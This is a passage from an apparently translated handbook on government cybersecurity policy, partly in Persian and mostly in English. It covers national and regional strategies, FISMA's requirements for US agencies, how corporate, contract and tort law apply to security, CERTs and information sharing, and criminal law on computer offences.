‫ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﺭ ﺍﻛﺘﺒـﺮ ‪ ۱۹۹۷‬ﺍﺭﺍﺋـﻪ ﺩﺍﺩ ﻭ‬
‫ﺧﻮﺍﺳﺘﺎﺭ ﻫﻤﻜﺎﺭﻱ ﺻﻤﻴﻤﺎﻧﻪﺗﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﺷﺪ‪.‬‬
‫ﻓﺎﺯ ﺩﻭﻡ‪ ،‬ﺍﻳﺠـﺎﺩ ﺳـﺎﺧﺘﺎﺭﻫﺎﻱ ﺛﺎﺑـﺖ ﺩﺭ ﺑﺨـﺶ ﺍﺟﺮﺍﻳـﻲ ﺑـﺮﺍﻱ‬
‫ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳـﺘﻬﺎ ﺍﺳـﺖ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ‬
‫ﻛﺎﻧﺎﺩﺍ ﺑﺪﻧﺒﺎﻝ ﺍﻧﺘﺸﺎﺭ ﻧﺘﺎﻳﺞ ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺗﻮﺳـﻂ ﻛﻤﻴﺘـﺔ ﺩﺍﺧﻠـﻲ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ‪ ،٣٤‬ﺩﻭﻟﺖ ﻳﻚ ﻣﺮﻛـﺰ ﻫﻤﻜـﺎﺭﻱ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺣﻔﺎﻇﺖ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺍﺭﺯﻳـﺎﺑﻲ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﺑﺮﺭﺳـﻲ‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛ ﻭ ﻳﻚ ﺩﻓﺘﺮ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﺣﻴﺎﺗﻲ ﻭ ﺁﻣﺎﺩﮔﻲ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩﺁﻭﺭﺩﻥ ﻳـﻚ‬
‫‪٣٥‬‬
‫ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﺗﺄﺳﻴﺲ ﻛﺮﺩ‪.‬‬
In the United States, Clinton and Bush took several practical steps by establishing policy-making bodies in the executive branch. The plans called for a national proposal for protecting infrastructure to be prepared.[36] These presidential directives did not authorize government agencies to oversee private-sector systems, but instead stressed the need for cooperation and information sharing between government and the private sector. Other leadership structures are discussed in the section "Leadership and Organization".

The third phase consists of developing strategies. As noted above, a national cyber security strategy can be a stand-alone document or part of the national ICT strategies. The key point in this process is consultation between government and the private sector. In Japan, which merged cyber security into its overall ICT strategies, this process was carried out with the cooperation of the "Information Technology Strategy Center" in the cabinet and the "Information Technology Strategy Council", which was made up of twenty experts and was established primarily to combine the capabilities of the government and the private sector.[37]

The United States cyber security strategy is a stand-alone document, and its preparation was the product of a long process of public consultation managed by the staff of the National Security Council. The first draft of the strategy documents was published in 2000, a revised version in the autumn of 2002, and the final version in February 2003.[38] At every stage, the United States plans were revised on the basis of detailed consultations within government and between government and the private sector. Ten public meetings were also held in major cities of the world to gather the resources used in preparing these strategies. In these meetings civil-society groups, business partners and companies consulted with one another. Other cyber security strategies include that of Australia.[39]

[32] For more information, see the book cited in footnote 17.
[33] President's Critical Infrastructure Protection Board
[34] Critical Infrastructure Protection Task Force
[35] Office of Critical Infrastructure Protection & Emergency Preparedness [Canada], http://www.ocipep.gc.ca/critical/nciap/disc_e.asp
[36] In this area Clinton issued "Presidential Decision Directives" (PDD):
63: Critical Infrastructure Protection, May 22, 1998, http://www.fas.org/irp/offdocs/pdd-63.htm
62: Protection Against Unconventional Threats to the Homeland & Americans Overseas, May 22, 1998, http://www.fas.org/irp/offdocs/pdd-62.htm
After September 11, 2001 Bush also signed two executive orders under which operations were relocated and new entities were created in the executive branch to protect critical infrastructure:
E.O. 13228, Establishing the Office of Homeland Security & the Homeland Security Council, October 8, 2001, http://fas.org/irp/offdocs/eo/eo-13228.htm
E.O. 13231, Critical Infrastructure Protection in the Information Age, October 16, 2001, http://ciao.gov/News/EOonCriticalInfrastructureProtection101601.html
[37] e-Japan Security Policy Program, March 29, 2001, http://www.kantei.go.jp/foreign/it/network/priority-all/index.html
[38] The latest version is The National Strategy to Secure Cyberspace: http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf. This strategy was prepared with the help of the following document: The National Strategy for Physical Protection of Critical Infrastructures & Key Assets: http://www.dhs.gov/interweb/assetlibrary/Physical-Strategy.pdf. Both of these documents describe components of the national security strategy and were published by the White House in July 2002.
Work on developing such strategies has also taken place at the regional level. The European Union has set out its cyber security strategy not in a single document alone but over several years, in a series of documents relating to proposals of the European Commission.[40] Asia Pacific Economic Cooperation (APEC)[41] has adopted regional cyber security strategies that were revised by the Telecommunications and Information Working Group (TEL)[42] with the active participation of the private sector.[43] The Organization of American States (OAS)[44] is also responsible for regional activities.[45] In June 2003 the General Assembly of the Organization of American States drew up a resolution for the preparation of an inter-American strategy against threats to access to computer information and networks.[46] The Organization for Economic Cooperation and Development (OECD)[47] has likewise published guidelines for governments and private companies on developing a cyber security strategy.[48]

[39] E-Security National Agenda [Australia], September 2001, http://www.noie.gov.au/projects/confidence/Protecting/nat_agenda.htm
[40] European Commission, Proposal for a Regulation of the European Parliament & of the Council - Establishing the European Network & Information Security Agency, Feb. 11, 2003, COM (2003) 63 Final, 2003/0032 (COD), http://europa.eu.int/information_society/eeurope/action_plan/safe/documents/nisa_en.pdf
[41] Asia Pacific Economic Cooperation
[42] Telecommunications and Information Working Group
[43] This document can be found at: http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html
In October 2002 the APEC ministers recognized the importance of protecting the integrity of APEC's information and communication systems while benefiting from the free flow of information. In response, they drew on the TEL cyber security strategy and instructed officials to implement it: http://203.127.220.67/apec/ministerial_statements/annual_ministerial/2002_14th_apec_ministerial.html#policies
[44] Organization of American States
[45] The initial task of the OAS was cybercrime. For more information, see: http://www.oas.org/juridico/english/cyber_experts.htm
[46] Development of an Inter-American Strategy to Combat Threats to Cybersecurity, AG/RES. 1939 (XXXIII-0/03). The resolution was adopted at the fourth session on June 10, 2003. For more information, see this footnote in the original book. The electronic version of the original book is available at: http://www.infodev-security.net/handbook
[47] Organization for Economic Cooperation and Development
[48] Organization for Economic Cooperation & Development, OECD Guidelines for the Security of Information Systems & Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034000.pdf
Implementation Plans for the OECD Guidelines for the Security of Information Systems & Networks: Towards a Culture of Security, Organization for Economic Cooperation & Development, Working Party on Information Security & Privacy, DSTI/ICCP/REG(2002)6/FINAL, Jan. 21, 2003, http://www.olis.oecd.org/olis/2002doc.nsf/LinkTo/dsti-iccp-reg(2002)6-final
[49] For details see: APEC, "Statement on the Security of Information & Communications Infrastructure," Fifth APEC Ministerial Meeting on Telecommunications and Information Industry, Shanghai, China, May 29-30, 2002, http://www.apecsec.org.sg/virtualib/minismtg/telminAnnexB_SICT.html
For more information, see this footnote in the original book. The electronic version of the book is available at: http://www.infodev-security.net/handbook.

Out of all these efforts, a coherent and integrated set of themes for cyber security strategies at the national, regional and international levels has emerged:

• Public-private partnership
Cyber security requires cooperation between the public and private sectors.[49] The private sector bears primary responsibility for ensuring the security of its own systems and networks.

• Public awareness
"Users of the network, including producers, administrators, operators and individual users, must be aware of the threats to and vulnerabilities of the network and must take on responsibility for protecting the network according to their position and role."[50]
• International practices, guidelines and standards
Cyber security should be developed on the basis of the growing number of standards and best practices, in a voluntary and consensus-based manner, and practices should be developed through consultative institutions and international standards organizations. These standards are an important guide for the government's internal policies. The government does not need to, and should not, set technical standards for the private sector.[51]

• Information sharing
It has become entirely clear that efforts to establish cyber security have been met with users' inattention to vulnerabilities and attacks. Private-sector organizations should be encouraged to share information about security incidents with other organizations in the sector, with government, and with other countries.

• Education and training
The APEC strategies state: "Human resource development is essential if efforts to raise the level of security are to bear fruit. To secure cyberspace, governments and the companies working with them must train their staff on the complex technical and legal issues surrounding the protection of critical infrastructure and cybercrime."

• The importance of privacy[52]
ICT networks carry and store highly sensitive personal data. Privacy is an essential component of trust in cyberspace, and cyber security strategies must be implemented in ways that are consistent with society's important values.[53]

• Vulnerability assessment, warning and response
As the APEC strategies put it: "Effectively combating cyberspace offenses and protecting infrastructure information depends on economies having systems that assess threats and vulnerabilities and issue the necessary warnings. By identifying and sharing information about a threat before it causes widespread damage, networks are better protected."[54] The United States strategies asked all experts to take part in creating a system that would respond to cyber security at the national level, so that attacks on computer networks are identified quickly.

• International cooperation
To make consultation and cooperation on spreading a "culture of security" between government and the private sector easier at the international level, governments must cooperate with one another to enact compatible laws on cybercrime, and the law-enforcement forces of different countries must assist one another through international organizations.[55]

[50] APEC Cybersecurity Strategy, http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html
Council of European Union, Council Resolution of 28 January 2002 on a common approach & specific actions in the area of network & information security, (2002/C 43/02), http://www.europa.eu.int/information_society/eeurope/action_plan/safe/netsecres_en.pdf
[51] For example, the United States strategy covers both government systems and private-sector infrastructure, but states that government should not impose its security standards on the private sector. For more information, see: The National Strategy to Secure Cyberspace [U.S.], February 2003, pp. 11, 15, http://www.whitehouse.gov/pcipb, http://www.dhs.gov/interweb/assetlibrary/National_Cyberspace_Strategy.pdf
[52] Respect for Privacy
[53] OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034000.pdf
For more information, see the internet addresses in footnote 48.
[54] APEC Cybersecurity Strategy, http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html
The process of developing and implementing cyber security strategies for government has elements in common with developing and implementing a cyber security program in other organizations and legal entities:

• Assessing vulnerabilities;
• Raising the level of awareness;
• Appointing one person as leader to coordinate policies;
• Developing a risk management[56] program;
• Adopting appropriate security policies;
• Structural justification; and
• Periodic reassessment and continuous improvement.

The fourth phase (with a focus on government security systems) is the announcement of policies and the enactment of the laws needed for cyber security. Some countries, such as Japan and Italy, have addressed the subject through such policies. In July 2000 Japan's cabinet-level IT Security Promotion Committee adopted guidelines on IT security policy in which all departments and ministries were asked to carry out an assessment of their IT security policies by February 2003 and to take further steps to raise the level of security. In March 2001 the Ministerial Council for Promoting the Digitization of Public Administration[57] published security policies for everyone involved in government information technology.[58] In 2002, when the United States Congress concluded that the executive branch had not sufficiently improved the security of government computer systems, it promulgated the Federal Information Security Management Act (FISMA)[59] to clarify requirements and procedures within government.[60] Something similar took place in Tunisia, where in 2002 the government enacted and promulgated security laws under which government organizations were required to undergo an annual security audit.[61]

[55] Meeting of G8 Ministers of Justice & Home Affairs, Paris, May 5, 2003, http://www.g8.utoronto.ca/justice/justice030505.htm
[56] Risk Management
[57] Ministerial Council for Promoting the Digitization of Public Administration
[58] http://www.kantei.go.jp/foreign/it/network/priority-all/7.html
[59] Federal Information Security Management Act
[60] Federal Information Security Management Act, Title III of E-Government Act of 2002, Pub. Law 107-347, http://csrc.nist.gov/policies/FISMA-final.pdf
[61] Auditing
[62] See the previous footnote, and also: http://www.fedcirc.gov/library/legislations/FISMA.html
[63] Title 44, United States Code, section 3544
[64] Unauthorized Access

Implementing Cyber Security Strategy in Government Systems - The United States Approach

In the United States, the security policy for the government's information systems has been specified in greater detail and implemented through the Information Security Management Act[62] (enacted in 2002). This law sets out some of the operating procedures of cyber security policy that create "accountability" in the various agencies.

The specific aim of FISMA is to manage computer security across government. It causes all efforts made to secure information to be coordinated with one another, and provides a mechanism for developing and maintaining the minimum controls needed to protect the government's information systems. The law acknowledges that commercial products provide effective and dynamic solutions for government, and it leaves the choice of specific hardware and software security solutions to the specialized agencies.

FISMA states that the head of each agency must develop, document and implement an agency-wide information security program that covers the agency's operations, including those managed by contractors.[63] This program must include the following:

• Periodic assessment of risks and of the magnitude of harm that may be done to information through causes such as unauthorized access[64] (use, disclosure, disruption, modification or deletion);
• Developing policies and procedures that:
  o are based on the risk assessment process;
  o lead to a reduction in the costs of security risks;
  o ensure that information security is fully addressed throughout the life cycle of each agency information system; and
  o ensure that the security requirements and standards of the Office of Management and Budget[65] (OMB, part of the Executive Office of the President) are met;
• Developing subordinate plans for providing adequate information security for networks, facilities, and systems or groups of information systems;
• Holding training courses to raise the security awareness of agency staff, contractors and other users of information systems who work in the agency;
• Periodic testing and evaluation of the effectiveness of information security policies, procedures and practices, including testing of management, operational and technical controls;
• A process for planning, implementing, evaluating and documenting the remedial action needed to address deficiencies in the agency's information security policies, procedures and practices;
• Procedures for detecting, reporting and responding to security incidents; and
• Plans and procedures to ensure continuity of operations for the agency's information systems.

Practices must also be taken into account in a number of other plans and reports, including those relating to the agency's annual budget, financial management, internal auditing and administrative controls. If any deficiency is found in policies, procedures or practices, it must be reported to the Office of Management and Budget and to Congress.

Each year agencies must provide an independent security evaluation to determine the effectiveness of their information security program and practices. Each evaluation has two parts: the first examines the effectiveness of the information security policies, procedures and practices of a subset of the agency's information systems; the second is an assessment of the related information security policies, procedures, standards and guidelines.[66]

To ensure that all information security policies and best practices are implemented, FISMA requires the representative of the Office of Management and Budget to oversee the development and implementation of all information security policies and practices. FISMA also delegates to the National Institute of Science and Technology the authority to develop standards, guidelines and minimum information security requirements,[67] and requires the representative of the Office of Management and Budget to manage the fulfilment of these requirements and to review and amend agency information security programs at least once a year. The representative of the Office of Management and Budget is responsible for reporting annually to Congress on agency performance.[68]

Each agency must submit an annual report to the representative of the Office of Management and Budget and to the congressional committees on the adequacy and effectiveness of its information security policies, procedures and practices, and on the extent to which they comply with the elements required in the information security program. In addition, the adequacy and effectiveness of information security policies, procedures and

[65] Office of Management and Budget
[66] Title 44, United States Code, section 3545
[67] Title 40, United States Code, section 11331
[68] Title 44, United States Code, section 3543
Chapter 3
The Role of Law and Government Policy in Relation to the Private Sector

Organizations have strong incentives to secure their information systems, because their interests depend on it. If a company does not protect itself against the problems of cyberspace, the resulting losses directly threaten its interests. Cyberspace security breaches can halt a company's business activity and damage its reputation. An attack on a company's computer network may stop its operations and cause customer data or trade secrets to be damaged or destroyed. Any company that has not paid the necessary attention to security may lose all its customers to competitors that do pay adequate attention to it. If makers of computers and software produce insecure products, they may quickly lose their customers.

Extending Traditional Legal Responsibilities to Cyberspace

In addition to the pressure the market places on producers to provide security, laws can also be a motivating factor. Companies face a set of responsibilities arising from traditional concepts such as company law, contract law and liability law (for compensation of intentional and unintentional damage). They also face newer laws, such as those on the secure registration and sale of securities on public exchanges and the prevention of deceptive and unfair trade practices. How these traditional legal responsibilities apply to cyber security has attracted considerable attention and effort. At present, legislative bodies, by setting general laws or issuing case-specific circulars and regulations, are trying to apply the rule-based systems of traditional commerce to computer security as well. In countries whose judicial system allows judges to interpret general legal concepts in light of new circumstances, judges can help resolve legal issues and problems of electronic security that require decisions about traditional legal concepts (such as negligence or failure to perform the duties assigned in a contract) and computer vulnerabilities.

Although such rules are rarely found even in the laws of developed countries, part of the policy-making and law-drafting effort of every country, developed or developing, should be devoted to electronic security issues (issues such as how traditional legal concepts are used in matters like threats and responsibilities in the field of computer security).

In this section we discuss ways in which general policies and laws evolve so that they can also be applied in the field of computer security. Chapter 4 also discusses government policies designed specifically to improve electronic security in the private sector.

Laws on Corporate Governance, Accounting, and the Registration and Sale of Securities

Under corporate law, directors and officers may owe the organization and its shareholders a duty to exercise careful foresight over the organization's business operations. It is increasingly accepted that this foresight also covers matters such as computer security. Some experts have noted that if managers fail to take appropriate steps to assess security threats, they will be liable to the company's shareholders in the event of loss.

In the United States, duties of this kind, which arise from general corporate law, have been reinforced by the enactment of criminal statutes. The Sarbanes-Oxley Act (enacted in 2002) imposed several new requirements on companies and, by publicizing security scandals on a large scale, drew public attention. Congress established that electronic security is essential for evaluating companies' financial data. Congress also made the evaluation of companies with respect to the security of their information systems mandatory. In addition, under general corporate law, publicly traded companies must undergo financial audits by independent auditors. If the auditors find that electronic vulnerabilities threaten the company's financial records, they add electronic security indicators to the scope of their audit. A number of relevant organizations have created standards and guidelines for auditors to use.
Contract Law

Under contract law, organizations must accept responsibility for unlawful access to, or damage to, customer data resulting from electronic security deficiencies. Under this law, a company that states in its electronic texts that it "has a secure system" is deemed to have entered into a bilateral agreement with its customer under which it is obliged to interact with customers in a secure environment. In such a case, if the security of the customer's information is compromised by electronic attacks, the customer can claim breach of obligations. Likewise, companies that provide web-based services may by contract assume responsibility for the availability of their services. In this case too, if the website is prevented from operating and providing service as a result of denial-of-service[69] attacks, the company will be exposed to claims of breach of obligations from customers.

Tort Law

From a legal standpoint, the concept of tort (civil liability for inadvertent harm) applies to the various kinds of computer security harm. For example, applying traditional tort law to computer offenses, if a company does not take reasonable measures to protect customer information against electronic attacks, it may face claims of breach of obligations from its customers. When a company's computers are used to carry out electronic attacks on a third party, the intermediary company may be held at fault if effective measures to prevent computer theft had not been taken. When an attack is carried out by one of the company's employees, victims may, on proving this, accuse the company of neglecting the necessary hiring or supervisory rules and standards.

At present, even in the United States, where tort laws exist in many areas, laws of this kind have not been much developed, and courts have not yet declared attention to network security to be a legal duty. Nonetheless, perhaps only the passage of time will make the old theories of liability applicable in the field of computer security. At that point courts will be able to derive computer security standards from the best practices of legislators and the business community, and standards can also be refined by self-regulatory organizations.

[69] Denial of Service
Chapter 4
Government Cyber Security Policies

Governments have gradually realized that they must adopt policies that specifically address private-sector cyber security. This may also include adapting other private-sector laws to fit the issues of computer security. Experience has shown that a key condition of successful legislation is to limit laws to specific conditions and situations. With this in mind, governments have defined the private sector's duties without specific reference to technology or standards. In Europe, responsibility for computer security has been placed on all sectors by the Data Protection Directive,[70] and the government of Singapore has likewise made computer security a fixed part of the requirements of the financial sector. In recent years, United States government laws have clearly defined computer security responsibilities in the banking industry and the health care industry. These cases are described in detail below, but first we turn to some important roles of government toward the private sector, all of which are other than legislation.

Non-Legislative Roles of Government

There are various ways of applying government policy to the security of private-sector computer systems. These policies are not all legislative; many of them, which may even have greater effect, can be non-legislative policies.

Research - One of government's important roles is funding and conducting research on computer security. The United States National Institute of Standards and Technology (NIST)[71] is a non-legislative government agency within the United States Department of Commerce. NIST's mission is to develop and promote measurement, standards and technology to increase productivity, facilitate trade and improve the quality of life.

NIST's computer security division carries out the following activities to improve the security of an information system:

• Raising awareness of information technology risks, vulnerabilities and protection requirements;
• Researching, studying and advising organizations that are exposed to information technology vulnerabilities;
• Devising solutions for establishing security in sensitive government systems;
• Developing standards, metrics, tests and validation programs to promote, measure and evaluate security in systems and services;
• Providing the minimum security requirements for government systems;
• Providing guidance for securing the planning, implementation, management and operation of information technology;

In making research results public, government agencies must in some way overcome their inclination toward secrecy. A good example is the top-secret National Security Agency in the United States, which has placed its security recommendations on the agency's public website for everyone to access.

Standards - Government is also one of the important decision-makers in setting private-sector standards. Standard-setting is a non-legislative, voluntary, consensus-based process, but government experts can also take part in it, especially if the government supports public-sector computer security research.

Awareness, education and capacity building: Another non-legislative role of government is public education and cooperation with the private sector to raise awareness of vulnerabilities and methods of prevention. Case studies and reports such as those described earlier are among the tools for achieving this goal. The European Commission has asked its members to draw up a program of public education and awareness that covers the full range of audiences. Presenting the aforementioned reports and strategies to expert forums is effective in raising awareness. Education also includes scholarships, development programs and raising the knowledge level of human resources. The European Commission has recommended that member states place greater focus in courses on computer security.

[70] Data Protection Directive
[71] National Institute of Standards and Technology
Information sharing - Another important role of government is sharing information about computer security vulnerabilities, warning of new viruses and attacks, and offering suggestions for solving problems, security patches[72] and best practices. Government can fund information exchange centers such as the Computer Emergency Response Team (CERT)[73] and the cooperation centers that have been set up around the world. For example, the United States CERT at Carnegie Mellon University is a government research and development center that works to provide assistance in handling computer security incidents, publish security alerts, research long-term changes in networked systems, and provide training on how to prepare information security plans. Other countries that have a CERT include Malaysia, Japan, Australia and Korea. Mcert is a computer security emergency response center for small and medium-sized companies in Germany, which brings about cooperation between the private and public sectors through Germany's BITKOM ICT association, seven industrial investment sponsors and the German government.

Multinational structures are gradually emerging for better exchange of information at the regional and supra-regional levels. In June 2001 the European Commission published an agreement on strengthening CERT in Europe and on better participation by that center's executive members. In February 2003 the Commission went a step further and announced its decision to establish a Network and Information Security Agency.[74] In order to launch local CERTs, APEC took the lead in in-country training and in developing the capabilities of this center in the region's developing countries, and produced CERT guidelines. The G8 also created a network of permanent points of contact to facilitate cooperation and information exchange in the area of electronic crime; at present, governments that are not members of the G8 can also take part in it.

Similarly, governments around the world may in various ways establish institutions in the private sector that set up voluntary information-sharing systems, such as Information Sharing and Analysis Centers (ISAC).[75] For example, the United States has established ISACs for particular industry sectors (such as financial services, telephone communications and the electric power industry), and countries such as Canada, Germany, Japan and the Netherlands also have ISACs. The United Kingdom is pursuing the WARP[76] concept (Warning, Advice and Reporting Point): a nationwide network for better and faster preparation of advice and warnings about electronic attacks, and for more complete receipt of incident reports in that country.

Government can also create private and public committees for better exchange of security information. One example is the National Security Telecommunications Advisory Committee (NSTAC),[77] which is made up of thirty senior representatives of the communications industry, network service providers, information technology companies, and officials responsible for national security and emergency communication systems. NSTAC is also the President's industry adviser on problems relating to national security and emergency preparedness in communications policy.

[72] Security Patches
[73] Computer Emergency Response Team
[74] Network And Information Security Agency
[75] Information Sharing and Analysis Center
[76] Warning, Advice & Reporting Point
[77] National Security Telecommunication Advisory Committee

Criminal Law

Another way in which government can support private-sector systems is "criminal law". International and regional institutions have proposed that every country, as part of the legal framework for improving trust and security in cyberspace, should adapt its laws to counter offenses that undermine the confidentiality, integrity or availability of data. The operational framework of criminal law consists of substantive laws[78] and procedural laws,[79] which derive from privacy concepts that have specific application in cyberspace and also from field investigations.

Viruses that delete files, or break into a computer and cause data to be altered, or break into a website and change its appearance, all fall into this category. Identifying the element of "intent" is vital for distinguishing between criminal activity and mere ordinary mistakes or the accidental sending of viruses.
‫ﺷﺎﻳﺪ ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺑﺎﺷـﺪ‬
‫ﻛﻪ ﺑﻪ ﺍﻫﻤﻴﺖ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﻣﺠﻤـﻊ‬
‫ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ ﻣﻠــﻞ ﺩﺭ ﺩﺳــﺎﻣﺒﺮ ‪ ۲۰۰۰‬ﻭ ﮊﺍﻧﻮﻳــﻪ ‪۲۰۰۲‬‬
‫ﻗﻄﻌﻨﺎﻣــﻪﻫــﺎﻱ ‪ ۵۵/۶۳‬ﻭ ‪ ۵۶/۱۲۱‬ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﻣﺒــﺎﺭﺯﻩ ﺑــﺎ‬
‫ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻃﻲ ﺑـﻪ ﺗـﺼﻮﻳﺐ‬
‫ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﻗﻄﻌﻨﺎﻣﺔ ‪ ۵۵/۶۳‬ﺑﻴﺎﻥ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻛﺸﻮﺭﻫﺎ ﺑـﺮﺍﻱ‬
‫ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻥ ﭘﻨﺎﻫﮕـﺎﻩ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻴﻜﻪ ﻣﺮﺗﻜـﺐ ﺟـﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺍﻳﻦ ﻗﻄﻌﻨﺎﻣﺔ ‪ ۵۵/۶۳‬ﻋﻨﻮﺍﻥ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﺟﻬـﺖ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ )ﺑـﺎ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﺒـﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ(‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﻻﺯﻡ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ‪ .‬ﭘﻴـﺸﻨﻬﺎﺩ ﻗﻄﻌﻨﺎﻣـﺔ ‪ ۵۵/۶۳‬ﻧﻴـﺰ‬
‫ﺁﻣﻮﺯﺵ ﻗﻮﺍﻧﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ‪.‬‬
‫ﺳﺮﭘﻴﭽﻲ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺿﻮﻋﺔ ﺟﺮﺍﺋﻢ‬
‫•‬
‫ﺩﺯﺩﻱ ﺩﺍﺩﻩﻫﺎ‪ :٨٠‬ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺗﻌﻤـﺪﻱ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺍﺯ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺷـﺨﺎﺹ ﺍﺷـﺎﺭﻩ‬
‫ﻛــﺮﺩ‪ .‬ﺍﻳــﻦ ﻗــﻮﺍﻧﻴﻦ ﺑــﻪ ﻗــﺼﺪ ﺣﻔﺎﻇــﺖ ﺍﺯ ﻣﺤﺮﻣــﺎﻧﮕﻲ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﻬﻴﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻈﺎﻣﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺩﻧﻴﺎ‪ ،‬ﺭﺩﻳـﺎﺑﻲ‬
‫ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﺭﺍ ﺟـﺮﻡ ﻣـﻲ ﺩﺍﻧﻨـﺪ؛ ﻭ ﺍﻳـﻦ‬
‫ﻣﻔﻬﻮ ﹺﻡ ﺧﻮﺵﺗﻌﺮﻳﻒ ﺩﺭ ﺟﻬﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﻠﻔﻨﻲ ﻣﻲ ﺗﻮﺍﻧـﺪ‬
‫ﻛﺎﺭﻛﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺗﺪﺍﺧﻞ ﺩﺍﺩﻩﻫﺎ‪ :٨١‬ﺗﺨﺮﻳـﺐ‪ ،‬ﺣـﺬﻑ‪ ،‬ﻳـﺎ ﺗﻐﻴﻴـﺮ ﺗﻌﻤـﺪﻱ ﻭ‬
‫ﻼ ﺍﺭﺳــﺎﻝ‬
